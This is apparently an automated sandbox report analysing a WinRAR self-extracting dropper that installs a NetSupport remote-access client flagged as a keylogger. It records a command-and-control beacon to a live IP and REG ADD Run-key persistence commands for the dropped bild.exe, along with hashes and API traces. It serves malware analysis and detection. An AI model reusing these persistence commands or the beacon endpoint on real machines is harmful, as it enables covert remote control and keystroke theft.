Dec 24, 2024 17:47:52.032270908 CET	49704	443	192.168.2.5	45.76.253.210
Dec 24, 2024 17:47:52.032335997 CET	443	49704	45.76.253.210	192.168.2.5
Dec 24, 2024 17:47:52.032413006 CET	49704	443	192.168.2.5	45.76.253.210
Dec 24, 2024 17:47:52.168279886 CET	49704	443	192.168.2.5	45.76.253.210
Dec 24, 2024 17:47:52.168311119 CET	443	49704	45.76.253.210	192.168.2.5
Dec 24, 2024 17:47:52.168397903 CET	443	49704	45.76.253.210	192.168.2.5
Dec 24, 2024 17:47:52.376526117 CET	49705	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:52.496117115 CET	80	49705	104.26.0.231	192.168.2.5
Dec 24, 2024 17:47:52.496193886 CET	49705	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:52.496387005 CET	49705	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:52.615789890 CET	80	49705	104.26.0.231	192.168.2.5
Dec 24, 2024 17:47:53.781337976 CET	80	49705	104.26.0.231	192.168.2.5
Dec 24, 2024 17:47:53.782864094 CET	49705	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:53.803155899 CET	49705	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:53.803203106 CET	49705	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:53.811824083 CET	49706	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:53.931556940 CET	80	49706	104.26.0.231	192.168.2.5
Dec 24, 2024 17:47:53.935152054 CET	49706	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:53.935388088 CET	49706	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:54.055078983 CET	80	49706	104.26.0.231	192.168.2.5
Dec 24, 2024 17:47:55.226039886 CET	80	49706	104.26.0.231	192.168.2.5
Dec 24, 2024 17:47:55.226131916 CET	49706	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:55.226672888 CET	49706	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:55.226716042 CET	49706	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:55.227392912 CET	49707	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:55.349869967 CET	80	49707	104.26.0.231	192.168.2.5
Dec 24, 2024 17:47:55.349967957 CET	49707	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:55.350275040 CET	49707	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:55.469888926 CET	80	49707	104.26.0.231	192.168.2.5
Dec 24, 2024 17:47:56.649899006 CET	80	49707	104.26.0.231	192.168.2.5
Dec 24, 2024 17:47:56.649969101 CET	49707	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:56.650242090 CET	49707	80	192.168.2.5	104.26.0.231
Dec 24, 2024 17:47:56.650258064 CET	49707	80	192.168.2.5	104.26.0.231

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 17:47:52.216109037 CET	53004	53	192.168.2.5	1.1.1.1
Dec 24, 2024 17:47:52.354018927 CET	53	53004	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 17:47:52.216109037 CET	192.168.2.5	1.1.1.1	0x997b	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 17:47:52.354018927 CET	1.1.1.1	192.168.2.5	0x997b	No error (0)	geo.netsupportsoftware.com	104.26.0.231	A (IP address)	IN (0x0001)	false
Dec 24, 2024 17:47:52.354018927 CET	1.1.1.1	192.168.2.5	0x997b	No error (0)	geo.netsupportsoftware.com	104.26.1.231	A (IP address)	IN (0x0001)	false
Dec 24, 2024 17:47:52.354018927 CET	1.1.1.1	192.168.2.5	0x997b	No error (0)	geo.netsupportsoftware.com	172.67.68.212	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

45.76.253.210connection: keep-alivecmd=pollinfo=1ack=1

geo.netsupportsoftware.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	45.76.253.210	443	7216	C:\Users\Public\Netstat\bild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 17:47:52.168279886 CET	218	OUT	POST http://45.76.253.210/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.76.253.210Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.26.0.231	80	7216	C:\Users\Public\Netstat\bild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 17:47:52.496387005 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2024 17:47:53.781337976 CET	1127	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 16:47:53 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8f721366e97243c3-EWR CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nwl0fqpWj9aOs%2B5pPibZUS%2BNlzyyJl7qpE06vFDlziailyOKQLpU2dv5%2BYP2DQjlQ3RQa3dwBfFRWca3zhnIWLKoxmtnNejFhWWn%2Bg8BTapNO5piyQUp14xnyYqc0uXQmOE6fv%2BVSNw7Jct"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.26.0.231	80	7216	C:\Users\Public\Netstat\bild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 17:47:53.935388088 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2024 17:47:55.226039886 CET	1120	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 16:47:55 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8f72136feae17d24-EWR CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5nXncoeYjwhQke4Ub5QxCvwIOAE79H1YfjGNsnzfxAFE5xSi7t1sixwZM1paGZ1tFBWnIcxivtqRzQBYBELq2GRwcUp%2BurUxYqeRbV0Ft3nu3dUtSF9Rw1N4tI9bMh1LNi5HPvD9eQKu9HxJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=2081&min_rtt=2081&rtt_var=1040&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.26.0.231	80	7216	C:\Users\Public\Netstat\bild.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 17:47:55.350275040 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2024 17:47:56.649899006 CET	1121	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 16:47:56 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8f721378cfad7295-EWR CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sZuyri2NnFtYmfqTdNlP6gWjMRy%2B7Q%2FarxYesHy1LblTvdkZkY0sUstwcZC9GaC1ryEeizxLVy81a8Z406fWBHmbgmxS2rn0TzLSzip2DxQA0XzVOkmfRg6R8A6cSwJUAVTTI3xQVbaEyWks"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Target ID:	0
Start time:	11:47:48
Start date:	24/12/2024
Path:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe"
Imagebase:	0x3c0000
File size:	2'138'135 bytes
MD5 hash:	47CFCE938A71540A2039AEBD5ABE0783
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:47:49
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:47:49
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:47:49
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Imagebase:	0x30000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:47:49
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
Imagebase:	0x30000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:47:50
Start date:	24/12/2024
Path:	C:\Users\Public\Netstat\bild.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Netstat\bild.exe
Imagebase:	0xa50000
File size:	105'848 bytes
MD5 hash:	8D9709FF7D9C83BD376E01912C734F0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.2053735718.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\bild.exe, Author: Joe Security
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	11:48:00
Start date:	24/12/2024
Path:	C:\Users\Public\Netstat\bild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Netstat\bild.exe"
Imagebase:	0xa50000
File size:	105'848 bytes
MD5 hash:	8D9709FF7D9C83BD376E01912C734F0A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2163282550.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.2160770098.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:48:08
Start date:	24/12/2024
Path:	C:\Users\Public\Netstat\bild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Netstat\bild.exe"
Imagebase:	0xa50000
File size:	105'848 bytes
MD5 hash:	8D9709FF7D9C83BD376E01912C734F0A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2246542222.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.2241928402.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2251969897.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:48:17
Start date:	24/12/2024
Path:	C:\Users\Public\Netstat\bild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Netstat\bild.exe"
Imagebase:	0xa50000
File size:	105'848 bytes
MD5 hash:	8D9709FF7D9C83BD376E01912C734F0A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2325321884.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2325776627.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.2323620387.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.1%
Total number of Nodes:	1448
Total number of Limit Nodes:	24

Executed Functions

Function 003DC131 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 199
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003CF353: GetModuleHandleW.KERNEL32 ref: 003CF36B
Part of subcall function 003CF353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003CF383
Part of subcall function 003CF353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003CF3A6

Part of subcall function 003D8B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 003D8B96

Part of subcall function 003D9036: OleInitialize.OLE32(00000000), ref: 003D904F
Part of subcall function 003D9036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 003D9086
Part of subcall function 003D9036: SHGetMalloc.SHELL32(004020E8), ref: 003D9090

Part of subcall function 003D0722: GetCPInfo.KERNEL32(00000000,?), ref: 003D0733
Part of subcall function 003D0722: IsDBCSLeadByte.KERNEL32(00000000), ref: 003D0747

GetCommandLineW.KERNEL32 ref: 003DC179
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 003DC1A0
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 003DC1B1
UnmapViewOfFile.KERNEL32(00000000), ref: 003DC1EB

Part of subcall function 003DBE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 003DBE20
Part of subcall function 003DBE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 003DBE5C

CloseHandle.KERNEL32(00000000), ref: 003DC1F4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe,00000800), ref: 003DC20F
SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe), ref: 003DC221
GetLocalTime.KERNEL32(?), ref: 003DC228
_swprintf.LIBCMT ref: 003DC267
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 003DC279
GetModuleHandleW.KERNEL32(00000000), ref: 003DC27C
LoadIconW.USER32(00000000,00000064), ref: 003DC293
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 003DC2E4
Sleep.KERNEL32(?), ref: 003DC312
DeleteObject.GDI32 ref: 003DC351
DeleteObject.GDI32(?), ref: 003DC35D

Part of subcall function 003DA8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 003DA92C
Part of subcall function 003DA8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 003DA953

CloseHandle.KERNEL32 ref: 003DC39C

Strings

winrarsfxmappingfile.tmp, xrefs: 003DC194
*a@, xrefs: 003DC1E1
*xA, xrefs: 003DC1DC
STARTDLG, xrefs: 003DC2D9
sfxname, xrefs: 003DC21C
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 003DC258
sfxstime, xrefs: 003DC274
C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, xrefs: 003DC208, 003DC20D, 003DC21B, 003DC2A3

Memory Dump Source

Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$*a@$*xA$C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 985665271-3120864760
Opcode ID: f7f2d64844a0bc3b9ffc7a271c57255ef1221706fa7223b0aba975a2423fb624
Instruction ID: b85394f3aa85b04acc935d081ab0ccdcf0343cc18a7c7112d0b73436ab04d431
Opcode Fuzzy Hash: f7f2d64844a0bc3b9ffc7a271c57255ef1221706fa7223b0aba975a2423fb624
Instruction Fuzzy Hash: DE61E776914305AED313AB65FD49F7B3BACAB48700F04442BF941AB3A2DBB88D44C765

Function 003D8BD0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE(00000066,PNG,?,?,003D9AC8,00000066), ref: 003D8BE1
SizeofResource.KERNEL32(00000000,75FD5780,?,?,003D9AC8,00000066), ref: 003D8BF9
LoadResource.KERNEL32(00000000,?,?,003D9AC8,00000066), ref: 003D8C0C
LockResource.KERNEL32(00000000,?,?,003D9AC8,00000066), ref: 003D8C17
GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,003D9AC8,00000066), ref: 003D8C35
GlobalLock.KERNEL32(00000000), ref: 003D8C42
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 003D8C62
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 003D8C9D
